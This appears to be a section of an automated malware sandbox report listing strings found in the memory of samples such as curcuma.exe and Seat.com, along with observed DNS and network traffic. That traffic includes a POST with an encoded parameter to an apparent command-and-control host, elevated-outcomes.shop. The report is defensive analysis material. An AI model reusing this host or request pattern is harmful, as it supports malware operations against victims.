Source: curcuma.exe, 00000025.00000003.1803417504.0000012CDEE2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: extURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt"," equals www.youtube.com (Youtube)
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ive/cognitiveservices/ www.bing.com/fd/ls/ls.gif www.msn.com www.msn.cn www.microsoftstart.com cn.bing.com/api/ cn.bing.com/bnc/ cn.bing.com/pnp/ cn.bing.com/profile/interestmanager/update *.cn.mm.bing.net *.mm.cn.bing.net www.bing.com/HPImageArchive.aspx www.bing.com/api/custom/opal/reco/ www.bing.com/DSB cn.bing.com/DSB www.bing.com/DSB/partner/ cn.bing.com/DSB/partner/ www.bing.com/api/ www.bing.com/as/ www.bing.com/AS/Suggestions www.bing.com/AS/Suggestions/v2 www.bing.com/bnc/ www.bing.com/crop/warmer.png www.bing.com/historyHandler www.bing.com/images/sbidlg www.bing.com/pnp/ www.bing.com/profile/history/data www.bing.com/profile/interestmanager/update www.bing.com/retail/msn/api/shopcard www.bing.com/retailexp/msn/api/ www.bing.com/retailexpdata/msndata/ www.bing.com/rp/rms_pr.png www.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn msn-api.go2yd.com zerocodecms.blob.core.windows.net *.oneservice.msn.com *.oneservice.msn.cn api.msn.com api.msn.cn ent-api.msn.com ent-api.msn.cn ent-nf-api.msn.com ent-nf-api.msn.cn ppe-api.msn.com ppe-api.msn.cn graph.microsoft.com/beta/ graph.microsoft.com/v1.0/ https://*.vo.msecnd.net https://user.auth.xboxlive.com/user/authenticate https://xsts.auth.xboxlive.com/xsts/authorize https://titlehub.xboxlive.com/users/ https://t.ssl.ak.dynamic.tiles.virtualearth.net https://dynamic.t0.tiles.ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.msn.com https://proxy.uet.s.microsoft.com/tpv-dv/;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlP
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ive/cognitiveservices/ www.bing.com/fd/ls/ls.gif www.msn.com www.msn.cn www.microsoftstart.com cn.bing.com/api/ cn.bing.com/bnc/ cn.bing.com/pnp/ cn.bing.com/profile/interestmanager/update *.cn.mm.bing.net *.mm.cn.bing.net www.bing.com/HPImageArchive.aspx www.bing.com/api/custom/opal/reco/ www.bing.com/DSB cn.bing.com/DSB www.bing.com/DSB/partner/ cn.bing.com/DSB/partner/ www.bing.com/api/ www.bing.com/as/ www.bing.com/AS/Suggestions www.bing.com/AS/Suggestions/v2 www.bing.com/bnc/ www.bing.com/crop/warmer.png www.bing.com/historyHandler www.bing.com/images/sbidlg www.bing.com/pnp/ www.bing.com/profile/history/data www.bing.com/profile/interestmanager/update www.bing.com/retail/msn/api/shopcard www.bing.com/retailexp/msn/api/ www.bing.com/retailexpdata/msndata/ www.bing.com/rp/rms_pr.png www.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn msn-api.go2yd.com zerocodecms.blob.core.windows.net *.oneservice.msn.com *.oneservice.msn.cn api.msn.com api.msn.cn ent-api.msn.com ent-api.msn.cn ent-nf-api.msn.com ent-nf-api.msn.cn ppe-api.msn.com ppe-api.msn.cn graph.microsoft.com/beta/ graph.microsoft.com/v1.0/ https://*.vo.msecnd.net https://user.auth.xboxlive.com/user/authenticate https://xsts.auth.xboxlive.com/xsts/authorize https://titlehub.xboxlive.com/users/ https://t.ssl.ak.dynamic.tiles.virtualearth.net https://dynamic.t0.tiles.ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.msn.com https://proxy.uet.s.microsoft.com/tpv-dv/;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlP
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ive/cognitiveservices/ www.bing.com/fd/ls/ls.gif www.msn.com www.msn.cn www.microsoftstart.com cn.bing.com/api/ cn.bing.com/bnc/ cn.bing.com/pnp/ cn.bing.com/profile/interestmanager/update *.cn.mm.bing.net *.mm.cn.bing.net www.bing.com/HPImageArchive.aspx www.bing.com/api/custom/opal/reco/ www.bing.com/DSB cn.bing.com/DSB www.bing.com/DSB/partner/ cn.bing.com/DSB/partner/ www.bing.com/api/ www.bing.com/as/ www.bing.com/AS/Suggestions www.bing.com/AS/Suggestions/v2 www.bing.com/bnc/ www.bing.com/crop/warmer.png www.bing.com/historyHandler www.bing.com/images/sbidlg www.bing.com/pnp/ www.bing.com/profile/history/data www.bing.com/profile/interestmanager/update www.bing.com/retail/msn/api/shopcard www.bing.com/retailexp/msn/api/ www.bing.com/retailexpdata/msndata/ www.bing.com/rp/rms_pr.png www.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn msn-api.go2yd.com zerocodecms.blob.core.windows.net *.oneservice.msn.com *.oneservice.msn.cn api.msn.com api.msn.cn ent-api.msn.com ent-api.msn.cn ent-nf-api.msn.com ent-nf-api.msn.cn ppe-api.msn.com ppe-api.msn.cn graph.microsoft.com/beta/ graph.microsoft.com/v1.0/ https://*.vo.msecnd.net https://user.auth.xboxlive.com/user/authenticate https://xsts.auth.xboxlive.com/xsts/authorize https://titlehub.xboxlive.com/users/ https://t.ssl.ak.dynamic.tiles.virtualearth.net https://dynamic.t0.tiles.ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.msn.com https://proxy.uet.s.microsoft.com/tpv-dv/;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlP
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ive/cognitiveservices/ www.bing.com/fd/ls/ls.gif www.msn.com www.msn.cn www.microsoftstart.com cn.bing.com/api/ cn.bing.com/bnc/ cn.bing.com/pnp/ cn.bing.com/profile/interestmanager/update *.cn.mm.bing.net *.mm.cn.bing.net www.bing.com/HPImageArchive.aspx www.bing.com/api/custom/opal/reco/ www.bing.com/DSB cn.bing.com/DSB www.bing.com/DSB/partner/ cn.bing.com/DSB/partner/ www.bing.com/api/ www.bing.com/as/ www.bing.com/AS/Suggestions www.bing.com/AS/Suggestions/v2 www.bing.com/bnc/ www.bing.com/crop/warmer.png www.bing.com/historyHandler www.bing.com/images/sbidlg www.bing.com/pnp/ www.bing.com/profile/history/data www.bing.com/profile/interestmanager/update www.bing.com/retail/msn/api/shopcard www.bing.com/retailexp/msn/api/ www.bing.com/retailexpdata/msndata/ www.bing.com/rp/rms_pr.png www.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn msn-api.go2yd.com zerocodecms.blob.core.windows.net *.oneservice.msn.com *.oneservice.msn.cn api.msn.com api.msn.cn ent-api.msn.com ent-api.msn.cn ent-nf-api.msn.com ent-nf-api.msn.cn ppe-api.msn.com ppe-api.msn.cn graph.microsoft.com/beta/ graph.microsoft.com/v1.0/ https://*.vo.msecnd.net https://user.auth.xboxlive.com/user/authenticate https://xsts.auth.xboxlive.com/xsts/authorize https://titlehub.xboxlive.com/users/ https://t.ssl.ak.dynamic.tiles.virtualearth.net https://dynamic.t0.tiles.ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.msn.com https://proxy.uet.s.microsoft.com/tpv-dv/;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlP
Source: global trafficDNS traffic detected: DNS query: ZuYwLYOGpsYmohRivNRzySjfrEDfR.ZuYwLYOGpsYmohRivNRzySjfrEDfR
Source: global trafficDNS traffic detected: DNS query: elevated-outcomes.shop
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global trafficDNS traffic detected: DNS query: assets.msn.com
Source: global trafficDNS traffic detected: DNS query: api.msn.com
Source: global trafficDNS traffic detected: DNS query: c.msn.com
Source: global trafficDNS traffic detected: DNS query: dns.quad9.net
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: unknownHTTP traffic detected: POST /NTIyOTQ3Mw?ihaigqg=S77l%2BqQIqU5Z8Of519CEd47wpU8km8qz4lAsqKSDbJbV88cNCbNkQ5co2yv9Yi3V%2B4UngeF2wrQ9x0YVDwI%2Fnw%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Content-Length: 149Host: elevated-outcomes.shop
Source: global trafficTCP traffic: 192.168.11.20:50093 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:50093 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:50093 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:50093 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:62123 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:62123 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:62123 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:62123 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:54621 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:54621 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:54621 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:54621 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:55018 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:55018 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:55018 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:55018 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:65297 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:65297 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:65297 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:65297 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:60219 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:60219 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:60219 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:60219 -> 239.255.255.250:1900
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: curcuma.exe, 00000025.00000003.1853736172.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1791550747.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2038350228.0000012CE2C1E000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1818041128.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1788688027.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1853736172.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: curcuma.exe, 00000025.00000003.1879613878.0000012CDEEBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdn.adnxs-simple.com/w3c/policy/p3p.xml
Source: curcuma.exe, 00000025.00000003.2010925300.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616351848.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2051938064.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1604475755.0000012CDD35F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1627781449.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1923866933.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2058966823.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616886676.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2023877190.0000012CDD346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: curcuma.exe, 00000025.00000003.2010925300.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616351848.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2051938064.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1604475755.0000012CDD35F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1627781449.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1923866933.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2058966823.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616886676.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2023877190.0000012CDD346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: curcuma.exe, 00000025.00000003.1853736172.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1791550747.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2038350228.0000012CE2C1E000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1818041128.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1788688027.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1853736172.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1853736172.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e5.i.lencr.org/0A
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e5.o.lencr.org0
Source: ADFoyxP.exe, 00000000.00000002.1649309138.0000000000408000.00000002.00000001.01000000.00000003.sdmp, ADFoyxP.exe, 00000000.00000000.860621425.0000000000408000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1818041128.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1788688027.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1853736172.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gtsr100
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmp, Seat.com, 0000000E.00000000.933109025.0000000000485000.00000002.00000001.01000000.00000007.sdmp, TradeHub.com, 00000017.00000000.958330490.0000000000885000.00000002.00000001.01000000.0000000A.sdmp, TradeHub.com, 00000019.00000002.1099287584.0000000000885000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1853736172.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: curcuma.exe, 00000025.00000003.2010925300.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616351848.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2051938064.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1604475755.0000012CDD35F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1627781449.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1923866933.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2058966823.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616886676.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2023877190.0000012CDD346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
